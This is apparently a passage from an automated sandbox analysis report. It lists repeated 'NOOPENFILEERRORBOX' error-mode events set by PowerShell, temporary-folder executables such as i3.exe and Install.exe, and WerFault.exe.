Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\i1.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u2xs.0.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\u2xs.2\run.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\u2xs.2\run.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\i3.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\i3.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\i3.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\i3.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\i3.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\i3.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\cmd.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\conhost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\u2xs.3.exe	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\u2xs.3.exe	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\u2xs.3.exe	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\u2xs.3.exe	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\u2xs.3.exe	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\u2xs.3.exe	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\u2xs.3.exe	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\u2xs.3.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\7zS5A79.tmp\Install.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
